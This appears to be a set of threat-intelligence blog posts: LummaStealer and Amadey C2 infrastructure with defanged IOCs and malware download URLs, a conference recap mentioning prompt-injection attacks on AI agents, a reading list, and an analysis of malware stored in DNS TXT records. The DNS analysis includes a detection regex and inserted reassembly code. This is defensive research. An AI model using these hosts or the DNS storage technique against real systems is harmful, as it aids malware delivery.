Similar to the C2 domain anodes[.]pro but at considerably higher volume, the C2 IP 185.156.72[.]96 has been observed with over 2,700 malicious files communicating with it, notably spanning many of the same malware-as-a-service families.  

In addition, many of the malicious files for LummaStealer and Amadey shared a common C2 IP “185.156.72[.]96” and overlaps with a previous LummaStealer IP “185.156.72[.]2”.

Both IPs are part of an obscure ASN, AS61432 (TOV VAIZ PARTNER). The ASN announces only one prefix (185.156.72.0/24), which shows only 1 out of 719 BGP peer propagations for Hurricane Electric Services. The ASN claims Ukrainian origin and appears to be propagated by only one other ASN, AS50073 (Webcraft Found LLC) in Ukraine. This generally suggests the ASN is part of a bulletproof hosting service (BPHS).
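The single-prefix, single-upstream, low-visibility combination described above is checkable from route-collector data. The Python below is an added example, not the post's analysis: it flags an origin ASN meeting all three conditions from a list of (peer, prefix, AS path) observations. AS61432, AS50073, the prefix and the 719-peer figure come from the text; the observations themselves and the 5% visibility threshold are constructed assumptions.

```python
"""Prefix visibility check for a suspected bulletproof-hosting ASN.

Added example, not the post's own analysis. AS61432, AS50073, the prefix
and the 719 peer-feed figure come from the text; the route observations
below are constructed, so the counts they produce only illustrate the
shape of the check. A real run would load RouteViews/RIPE RIS RIB dumps
or a bgp.tools export in place of OBSERVATIONS.
"""
from collections import Counter

# Constructed observations: (collector peer ASN, prefix, AS path). One row
# per peer that carries the prefix; peers not listed do not see it.
OBSERVATIONS = [
    (6939, "185.156.72.0/24", [6939, 50073, 61432]),
    (3356, "185.156.72.0/24", [3356, 6939, 50073, 61432]),
    (174,  "185.156.72.0/24", [174, 6939, 50073, 61432]),
    # documentation prefix from a well-connected origin, as a control case
    (6939, "203.0.113.0/24", [6939, 64500]),
    (3356, "203.0.113.0/24", [3356, 64500]),
    (174,  "203.0.113.0/24", [174, 64500]),
    (2914, "203.0.113.0/24", [2914, 64500]),
]
TOTAL_PEERS = 719  # size of the collector's peer set the prefix could appear in


def prefix_summary(obs, prefix):
    """How many peers see the prefix, who originates it, and via which upstreams."""
    rows = [(peer, path) for peer, pfx, path in obs if pfx == prefix]
    return {
        "peers_seeing": len({peer for peer, _ in rows}),
        "origins": {path[-1] for _, path in rows},
        # the AS immediately before the origin on each path
        "upstreams": Counter(path[-2] for _, path in rows if len(path) >= 2),
    }


def suspicious_origin(obs, asn, total_peers=TOTAL_PEERS, max_visibility=0.05):
    """Flag an origin that announces exactly one prefix, through exactly one
    upstream, visible to only a small share of peers. Thresholds are assumptions;
    the combination is what the post observed for AS61432, not proof of BPH."""
    prefixes = {pfx for _, pfx, path in obs if path[-1] == asn}
    if len(prefixes) != 1:
        return False, prefixes
    summary = prefix_summary(obs, next(iter(prefixes)))
    single_upstream = len(summary["upstreams"]) == 1
    low_visibility = summary["peers_seeing"] / total_peers <= max_visibility
    return single_upstream and low_visibility, prefixes


if __name__ == "__main__":
    for asn in (61432, 64500):
        flagged, prefixes = suspicious_origin(OBSERVATIONS, asn)
        print(f"AS{asn}: prefixes={sorted(prefixes)} suspicious={flagged}")
```

Low visibility on its own is weak evidence (new or regional networks look the same), which is why the check insists on the single upstream as well; a one-prefix ASN whose only transit is another small ASN in the same country is the shape that keeps turning up behind stealer C2.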

Example LummaStealer C2s associated with the IPs 185.156.72[.]2 and 185.156.72[.]96 and the domain anodes[.]pro

0a401e0be28cb02b549b63db4681a881ec03091ca058103debe30ef20070aba2
30dd56520191f9ac29e7eb87c3e428dec6c3ea90baca523ec46f9ce58c617921
0dd80560bfc501a9bcdcc45e76b232655eb8cba78d09a8414dc77236a3ead174
1149a01c5c8a3870ba40ca68f8e801cc38e5542c1938ed7ee01b14cf2e571258
293bf1f2b901f02f23af5c9221989ac82f27b2de061d7df9a035e09e713f914d
hxxps[:]//battlefled[.]top/gaoi
hxxps[:]//citellcagt[.]top/gjtu
hxxps[:]//diecam[.]top/laur/api
hxxps[:]//escczlv[.]top/bufi
hxxps[:]//korxddl[.]top/qidz
hxxps[:]//localixbiw[.]top/zlpa
hxxps[:]//narrathfpt[.]top/tekq
hxxps[:]//peppinqikp[.]xyz/xaow
hxxps[:]//sstemxehg[.]shop/gaks
hxxps[:]//stochalyqp[.]xyz/alfp

Pivoting on a reused SSH banner hash from the C2 IP address (Shodan hash:896675070 and hash:-434889431) identifies several historic overlaps, such as the following recent IPs:

185.156.72[.]97 > 0 malicious communicating files
176.46.157[.]50 > 570 malicious communicating files
185.156.72[.]96 > 2,800 malicious communicating files
66.114.52[.]156 > 1 malicious communicating file
176.46.157[.]32 > 660 malicious communicating files

There are also indications that the larger cluster of malware uses Amazon CloudFront, Amazon Global Accelerator EC2 endpoints, and GitHub user content to store and distribute malware, all of which complicate proactively blocking malicious domains.

Example 1:
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/36b05b6030459ba5435705d8b91aae11f0ba268b/NIOAHYWM.exe
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/6fd8d0859aa9d3d300bf79f3da8032b04b1ed540/OURDUBDV.exe
https[:]//github[.]com/peterson643eu/projecttop/raw/refs/heads/main/OURDUBDV.exe

Makes request to http[:]//nexuswarps[.]shop/c
C2s: anodes[.]pro, multiport[.]shop

An SSL hash overlap with a CloudFront IP resolving 70d9ae273c860e606f236c528381f9ca[.]cloudfront[.]net suggests the CloudFront service may be used to relay traffic to another endpoint serving malware.

Sampling 200 of the communicating files with meaningful detection names in VirusTotal, limited to the past three months, shows an overrepresented share of LummaC2 and Amadey.

Despite law enforcement takedowns targeting LummaStealer infrastructure in May 2025, Lumma appears to still be operating and continues to be a prominent choice. We speculate that this particular cluster experimented with alternative choices during June and may have opted to continue operations with LummaStealer.  

Conclusion

Despite a May 2025 law enforcement takedown targeting LummaStealer, the malware family appears to remain active and a popular choice for threat actors, particularly through bulletproof hosting services (BPHS) IPs. This analysis of observed malicious activity, with a focus on C2 IPs 185.156.72[.]96 and 185.156.72[.]2 (both part of AS61432, a suspected BPHS), suggests that while there may have been some experimentation with alternative malware during June, operations have largely continued with LummaStealer.

IOCs

kinwlyo[.]xyz
sstemxehg[.]shop
anodes[.]pro
stochalyqp[.]xyz
peppinqikp[.]xyz
financialway[.]pro
alababababa[.]cloud
chainnode[.]shop
multiport[.]shop
battlefled[.]top
localixbiw[.]top
korxddl[.]top
diecam[.]top
escczlv[.]top
citellcagt[.]top
narrathfpt[.]top
zurichinsurince[.]com
zhuchengsantian[.]com
metaskins[.]gg
blogcrptodevelopments[.]com
ripple-regulatory[.]com
ripple-legal[.]com
ripple-regulation[.]com
cfd-regulations[.]com
avatrade-supervision[.]com
avatrade-global[.]com
londonoffvisit[.]com
avatrade-regulation[.]com
avatrade-compliance[.]com
avatrade-services[.]com
betrunk[.]rocks
hugevcdn[.]pro
mary-mijote[.]frs
servicesmesh[.]pro
interconstructionsite[.]pro
osuszaczemlawa[.]pl
registrokim[.]online
orlideti[.]com
Hacker Summer Camp Recap - A Snick Snack

What do scavenger hunts, malware, and wildcards have in common?

Hacker Summer Camp recedes into the rearview mirror and the world starts back up again.

Morning standup. Q3 sprint. Follow-ups and circle-backs. But perhaps we’re changed. Perhaps we re-enter the frays in a slightly different way, shedding data of a marginally changed nature. Philosopher and media theorist Marshall McLuhan said that as a species, “We look at the present through a rear-view mirror” in our “march backwards into the future.”

He continued: “Because of the invisibility of any environment during the period of its innovation, man is only conscious of the environment that has preceded it; in other words, an environment becomes fully visible only when it has been superseded by a new environment.”

Does the landscape after BSidesLV, Black Hat, and DEF CON count as a new environment? Could the information gleaned, hands shaken, and drinks shared change us significantly going forward?

For my part, I always emerge from this week in Las Vegas and find my surroundings drawn into sharper relief. Finer lines mark more edges, but they also bring us together in more ways, if we let them. Light sources are brighter, or revealed as so bright they hid now-revealed details, like a message written on the lightbulb only visible in the briefest of moments upon flicking the switch off. 

McLuhan’s observation in mind, that may be my sign that our chaotic week of community each year marks a new environment, superseding the old and making the latter finally visible. 

Or perhaps that I just need more sleep this year.

—-------

Folks often pose the question: “Which is better, Black Hat or DEF CON?”

The real answer is, “It depends.” 

Black Hat starts the week out with everyone fresh and wide-eyed, staring down the barrel of at least six days of scrambling if they attend both conferences. It is to my benefit that we take care of the business end first before the social and sensory overwhelm hits - I’m much more articulate and sociable, moving mountains to meet practitioners, collaborators, and customers. Discussions are more hard-nosed, shorter, and more focused. Metrics rule the day.

That being said, Black Hat is a delight of a different sort. It’s a much more focused and organized entity rather than creeping chaos. Meeting up with other practitioners and talking shop involves a lot less small talk, with a substantial chunk of theory discussion and an even larger space held to talk practice. 

Plus, less bare concrete. 

One highlight of my Black Hat arrived early; my first briefing was From Prompts to Pwns: Exploiting and Securing AI Agents, presented by NVIDIA AI Red Teamers Rebecca Lynch and Rich Harang. Lynch and Harang began by providing an excellent technical foundation. Points included LLM compromise as enabled by a “universal anti-pattern” that allows for the attacks, as well as agentic autonomy classifications and their relation to both systems architecture and the introduction of nondeterminism into the system. They then pivoted to the practical nature of their red teaming and the realities that informed it. LLM guardrails are mostly just other LLMs performing checks, and so subject to similar attacks. And since these platforms are often crawling the web, the ability to introduce untrusted content spans the entire Internet. Specific technical observables included Cursor rules files, ASCII smuggling, and more. And the idea that malicious actors can more effectively use LLMs to socially engineer the user than other technologies was a brilliant insight.

The talk was equal parts funny and grim, and I’m now hungry to see more from NVIDIA’s AI Red Team.

Another highlight came from the venerable Threat Intel team at Infoblox, No Hoodies Here: Organized Crime in AdTech. The talk revolved around long-term and fascinating research around spam & scam cybercriminals VexTrio, accompanied by the second in Infoblox’ blog series on the group (you can find the first post here). Their research laid bare the evolution of VexTrio into an adtech powerhouse of villainy, complete with Instagram photos of their fast cars, lavish meals, and expensive boats. A deep understanding of both the technologies involved and the human behavior behind them emerged through excellent research and storytelling.

—-------

DEF CON is, of course, an entirely different animal. It’s about one-tenth the price, and I’d guess at least twice the size of Black Hat. And the chaos only ends where the concrete does too (that’s not hyperbole by the way, the floors are all concrete, bring good shoes and ibuprofen).

Now that DEF CON has moved to a single venue, it’s become a little more manageable, and staff learned the ins and outs of the new complex last year and applied those lessons to great effect. Attendance is much more widespread than Black Hat, with enthusiasts and other kinds of technologists in attendance. 

There’s more swagger, but there’s also more joy; folks assembling under an umbrella of energetic curiosity and irreverence and self-organizing across a number of villages as well as the main stage talks. 

We were able, and honored, to show up to DEF CON 33 in a big way and share three separate talks in three separate villages. 

DNS Scavenger Hunt
Security Advisor Malachi Walker gave an interactive talk at the Blacks in Cyber Village: Following Threat Actors’ Rhythm — to Give Them More Blues. The talk provided indicators to follow around threat actor activity and then engaged the crowd in a DNS-based scavenger hunt from the terminal.

Malware in DNS
Malachi Walker and Senior Security Operations Engineer Ian Campbell spoke on investigative findings in the Malware Village: Plain TXT, Malicious Context: Uncovering DNS Malware. Included were DNS investigation basics, and then several real-world examples of DNS TXT records being used for malware storage and retrieval as well as the step-by-step detection specifics. There’s a bonus round at the end of the slide deck for folks interested in domain mysteries!

Pre-Identifying DNS Wildcards: A New Standard of Care
CISO and Head of Investigations Daniel Schwalbe presented original research and enablement at Recon Village. Informed by a DEF CON 31 win at the Subdomain Enumeration Contest, an alternative method that identified 100 times the winning results required a parallel new solution for identifying and removing wildcarded domains.

Of course, other folks were there too. A LOT of them, actually. And many giving great talks on stages or in villages. Yael Grauer in the Crypto and Privacy Village on Cyber Defenses, cooperq and oopsbagel in the hackers.town community on Rayhunter Internals, and our friend Jon DiMaggio co-speaking with Jon Fokker on the Track 5 stage spilling the tea about a REvil actor, to name just a few. The latter was a fantastic talk that showed the deep and inextricable connection between ransomware observables, human behavior, and group dynamics with substantial realness. 

Summer in Las Vegas is always hot, and uncomfortable, and packed with people. But at the same time, filled to the brim with joy and curiosity, serious business alongside frenetic nerdery. Different but often parallel strains of justice running through many diverse communities celebrating their uniqueness and their shared loves and interests simultaneously. 

I don’t know of another week like it anywhere, and I wouldn’t have it any other way.

(except for maybe the concrete floors.)

Join our teams as they share their DEF CON talks on Tuesday, September 30: https://www.domaintools.com/defcon-session-recap-customer-webinar/

Cybersecurity Reading List - Week of 2025-07-28

Commentary followed by links to cybersecurity articles that caught our interest internally.

It is a lovely day in information security,

and you are a horrible goose.

(Collected from IRC, original source unknown. Reach out if you know.)

We’re a week away from Hacker Summer Camp, and I’m curious: similar to the writer conversation of “plotters versus pantsers” are your shenanigans all lined up in advance, or are your Vegas shenanigans more opportunistic and inspired by the moment? Do you carefully clean and arrange your tools, pack and unpack and repack in advance? Or do you live off the land and a few strips of rusty aluminum stripped from a can of Surge in 1997 and tucked in your wallet ever since?

Unless of course you’re the type of person to avoid shenanigans. Apparently those people exist.

This year’s Hacker Summer Camp includes some steam to vent. We’re charging into the desert amidst a cloud of hot dust and exploited SharePoint embers, a mass breach of women’s data after they sought safer dating, a new technology seemingly bent on speedrunning all the lessons computing has learned the hard way, and that’s not even getting into this year’s complexities around domestic agency capabilities. Everything considered, it’s enough to turn to nihilistic partying to cope.

But what I expect to see more of, what I’ve seen from the various clusters assembling for Black Hat, DEF CON, and BSides Las Vegas, is community. It’s our strongest power and our greatest defense. It’s often said that the Internet perceives censorship as damage and routes around it; and there may be drama, there may be dark points, there may be jerks, but community can react to damage the same way. And in many cases, it is.

Find the others. Reach out. Make grand collaborative plans, scale them back, amplify them further. Make room for the quieter voices. And don’t forget to make time to play.

Next week, let’s come to play. 

Podcasts

Lawfare - The Double Black Box: Ashley Deeks on National Security AI - Excellent, thoughtful exploration of ‘the idea that the use of artificial intelligence in the national security space creates a "double black box." The first box is the traditional secrecy surrounding national security activities, and the second, inner box is the inscrutable nature of AI systems themselves, whose decision-making processes can be opaque even to their creators.’ I picked up Deeks’ book immediately after listening to the podcast.

Srsly Risky Biz - Four key players drive Scattered Spider - Some interesting conclusions coming out lately. For instance, incident response investigators cross-referencing incidents attributed to SCATTERED SPIDER keep running across the same voices in voice-delivered social engineering attacks. Also, a few folks playing “Project Manager” roles. 

Articles

Okta - Okta observes v0 AI tool used to build phishing sites - Cheat-sheet style hint here: most Vercel-built sites have telltale DNS records CNAMEing back to vercel[.]com subdomains, and use vercel-dns[.]com nameservers. Maybe start building that into your detections and reassess once Vercel gets a handle on this. Looking at their nameservers for domains first seen July 28, I saw multiple career/application/hiring domains pretending to be from major corporations, several attempts at emulating the customer service platform of a major mobile provider, attempts to emulate adclick revenue and CRM platforms, and more. Just one day’s worth of new AI creations.

Proofpoint - NET RFQ: Request for Quote Scammers Casting Wide Net to Steal Real Goods | Proofpoint US - Good work by Proofpoint here amidst a fascinating scam leveraging “net-30” type financing to get goods or services, and then vanish. 

Resecurity - Cybercriminals Attack Seychelles – Offshore Banking as a Target - Well. That’s a shame.

The Record - Russian bulletproof hosting service Aeza Group sanctioned by US for ransomware work - Within a few days they started shifting their nameservers, and the primary ASN moved behind another Russia-aligned BGP safewall for its announcements. One of these days I need to dive deeper into technical observations after international sanctions; if you’ve got good examples, please reach out. 

knostic.ai - Exposing the Unseen: Mapping MCP Servers Across the Internet - Knostic (the startup brainchild of Gadi Evron and Sounil Yu) doing some great foundational fact-finding here around how organizations are deploying Anthropic’s Model Context Protocol. Unsurprisingly, the news isn’t good. 

Cisco Talos - Cybercriminal abuse of large language models - General but good roundup on some of the malicious uses seen in the wild. 

Lawfare - AI and Secure Code Generation - I don’t necessarily agree with everything, but Geer and Aitel know their stuff and make some very good points. 

Reuters - China-linked hackers target Taiwan's chip industry with increasing attacks, researchers say 

DTI - Malware in DNS - This was a quick but clever piece by one of our researchers that struck far louder chords than we expected. 

FT - Disinformation warriors are ‘grooming’ chatbots - LLM-grooming is the new cache poisoning, pass it on.

Research Papers and Reports

Censys - 2025 State of the Internet Report 

WEIS - Examining Newly Registered Phishing Domains at Scale 

Tools and Resources

INTERPOL - INTERPOL launches our new external newsletter  

Quad9 - Globe of Wonder - The good folks at Quad9 DNS have open-sourced their visualization tool for mapping realtime events onto a view of the Earth. 

Malware in DNS

Because it's always DNS, we wanted to share this fun finding of malware stored across DNS TXT records.

Recent reports of hiding images in DNS records inspired a search for such files in the wild, using passively collected DNS records available in DNSDB Scout. Put very simply, files can be partitioned and stored in DNS TXT records. They can then be retrieved via DNS requests and put back together. This also means these files may persist until the DNS server removes or overwrites the records, thereby providing a form of unwitting file or data storage. The initial report detailed partitioning image files and converting them to hexadecimal before issuing writes to a domain’s TXT records. For that reason, we began a search at the beginning of DNS TXT RDATA for the magic bytes of a wide range of executables and common file types in hexadecimal format, using regex patterns such as the following:

^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(47494638[79]61.{8,})|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})|(377abcaf271c.{8,})|(526172211a07.{8,}))

One of the findings from 2021-2022 was a set of TXT records beginning with the magic sequence for an executable file header.

C83464356139303030303330303030303030343030303030306666666630303030623830303030303030303030303030303430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030306538303030303030306531666261306530306234303963643231623830313463636432313534363836393733323037303732366636373732363136643230363336313665366536663734323036323635

The same .exe header value was seen on 3 different domains, each sharing the same subdomain pattern. 

Digging into one of the domains, “*.felix.stf.whitetreecollective[.]com.”, we see that it has several hundred iterated integer subdomain values, each with different TXT RDATA values. This suggested that they were fragmenting the .exe file across all the subdomains, using the integer value to track the correct sequence.

By exporting the JSON of the domain’s TXT records and having a generative AI throw a script together to piece the file back together in the correct order, we were able to observe the SHA256 hashes of the files stored in DNS TXT records:

  • 7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866
  • e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1

Both files appear to be Joke Screenmate malware. These are a form of prank software and may commonly exhibit the following behaviors once run on machines:

  • Simulating destructive actions: The program might display fake error messages, fictitious virus warnings, or animations that mimic the deletion of system files, causing panic for the user.
  • Interfering with user control: Some screenmates are designed to be difficult to close, may multiply on the screen, or actively evade the user's mouse cursor.
  • Displaying unsolicited content: These programs can present a continuous stream of jokes, images, or animations that can be distracting and difficult to stop.
  • System performance issues: Like any running application, they consume system resources, and poorly coded screenmates can lead to system slowdowns or crashes.

A brief review of other TXT records for the 3 domains opened another line of inquiry: malicious commands stored in TXT records. This was seen with multiple TXT records associated with drsmitty[.]com, such as the following subdomain’s TXT record: 15392.484f5fa5d2.dnsm.in.drsmitty[.]com.

The command contains an encoded PowerShell script that acts as a stager and connects to another domain: cspg[.]pw. The URL it requests (/api/v1/nps/payload/stage1) is the default endpoint for a Covenant C2 server to serve its next-stage payload.

The stager script being stored in a DNS TXT record is not by itself enough; some other action would have to take place first on a system to retrieve and execute the script, such as the following:

In summary, in 2021-2022 an actor was using DNS TXT records to store and possibly deliver ScreenMate malware and stagers for likely Covenant C2 malware infections. The same C2 domain was seen in another domain’s TXT record in July 2017, msg1.rickrick.qa.urab[.]org.
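As an added example (not the post’s own script), the two analyst steps above in Python: the post’s regex flags quoted TXT RDATA that opens with hex-encoded file magic, and integer-indexed subdomains under one parent are ordered, concatenated, hex-decoded and hashed. The records and the parent name are constructed placeholders, not the domains or files from the post.

```python
import hashlib
import re
from collections import defaultdict

# Regex from the post: hex-encoded file magic at the start of a quoted TXT RDATA
# (DNSDB exports TXT RDATA in double quotes, hence the ^" anchor).
MAGIC_RE = re.compile(
    r'^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(47494638[79]61.{8,})'
    r'|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})'
    r'|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})'
    r'|(377abcaf271c.{8,})|(526172211a07.{8,}))'
)

# Constructed sample: a fake "executable" (MZ header plus filler) hex-encoded and
# split across integer-indexed subdomains, mirroring the pattern in the post.
# The parent name is a placeholder, not a domain from the post.
FAKE_EXE = b"MZ\x90\x00" + b"\x00" * 6 + b"This program cannot be run in DOS mode"
FAKE_EXE_SHA256 = hashlib.sha256(FAKE_EXE).hexdigest()
_HEX = FAKE_EXE.hex()
_CHUNKS = [_HEX[i:i + 32] for i in range(0, len(_HEX), 32)]
SAMPLE_RECORDS = [
    {"rrname": f"{i}.felix.stf.example.test.", "rrtype": "TXT", "rdata": f'"{c}"'}
    for i, c in enumerate(_CHUNKS)
][::-1]  # reversed on purpose: reassembly must order by the integer label


def hits_magic(rdata: str) -> bool:
    """True if the quoted TXT RDATA starts with a known hex-encoded file magic."""
    return MAGIC_RE.match(rdata) is not None


def flag_magic(records):
    """Detection pass over passive-DNS records: names whose TXT RDATA hits the regex."""
    return [r["rrname"] for r in records
            if r.get("rrtype") == "TXT" and hits_magic(r["rdata"])]


def reassemble(records):
    """Group records whose leftmost label is an integer by parent name, order the
    fragments by that integer, hex-decode, and hash. Returns one entry per parent."""
    parts = defaultdict(dict)
    for r in records:
        if r.get("rrtype") != "TXT":
            continue
        first, _, parent = r["rrname"].partition(".")
        if first.isdigit():
            parts[parent][int(first)] = r["rdata"].strip('"')
    out = {}
    for parent, frags in parts.items():
        try:
            blob = bytes.fromhex("".join(frags[i] for i in sorted(frags)))
        except ValueError:
            continue  # not hex-encoded, or a fragment is garbled
        out[parent] = {"sha256": hashlib.sha256(blob).hexdigest(),
                       "size": len(blob), "fragments": len(frags),
                       "mz_header": blob[:2] == b"MZ"}
    return out
```

A missing fragment index still decodes if the hex stays even-length, so compare the fragment count against the highest index before trusting a hash.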

Ian Campbell